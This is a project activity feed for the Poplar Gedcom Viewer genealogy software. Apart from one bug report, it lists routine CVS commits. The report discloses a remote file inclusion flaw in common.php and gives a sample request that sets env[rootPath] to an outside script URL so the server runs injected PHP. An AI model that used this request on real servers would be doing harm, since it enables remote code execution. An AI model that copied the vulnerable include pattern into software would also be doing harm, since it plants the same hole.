-
Spammers and crackers seem to really like this line in common.php:
include_once( $env['rootPath'].'/include/adodb/adodb.inc.php' );
When they call the script like e.g.:
......./include/common.php?env[rootPath]=http://server.net/script.txt?
They can execute all sorts of PHP code inside your server installation !
- This assumes, of course, that register_globals and allow_url_fopen are...
2007-07-16 18:19:23 UTC by nobody
-
eugene_dub committed patchset 91 of module pgv_2_0_beta_1 to the Poplar Gedcom Viewer CVS repository, changing 1 files.
2005-07-21 19:19:39 UTC by eugene_dub
-
eugene_dub committed patchset 90 of module pgv_2_0_beta_1 to the Poplar Gedcom Viewer CVS repository, changing 1 files.
2005-07-15 20:39:12 UTC by eugene_dub
-
jgrotjan committed patchset 89 of module pgv_2_0_beta_1 to the Poplar Gedcom Viewer CVS repository, changing 2 files.
2004-02-20 22:24:03 UTC by jgrotjan
-
jgrotjan committed patchset 88 of module pgv_2_0_beta_1 to the Poplar Gedcom Viewer CVS repository, changing 1 files.
2004-02-20 22:17:46 UTC by jgrotjan
-
jgrotjan committed patchset 87 of module pgv_2_0_beta_1 to the Poplar Gedcom Viewer CVS repository, changing 1 files.
2004-02-20 22:15:44 UTC by jgrotjan
-
jgrotjan committed patchset 86 of module pgv_2_0_beta_1 to the Poplar Gedcom Viewer CVS repository, changing 23 files.
2004-02-20 22:10:44 UTC by jgrotjan
-
jgrotjan committed patchset 85 of module pgv_2_0_beta_1 to the Poplar Gedcom Viewer CVS repository, changing 1 files.
2004-02-20 21:56:01 UTC by jgrotjan
-
jgrotjan committed patchset 84 of module pgv_2_0_beta_1 to the Poplar Gedcom Viewer CVS repository, changing 1 files.
2004-02-17 00:10:46 UTC by jgrotjan
-
jgrotjan committed patchset 83 of module pgv_2_0_beta_1 to the Poplar Gedcom Viewer CVS repository, changing 1 files.
2004-02-17 00:10:06 UTC by jgrotjan
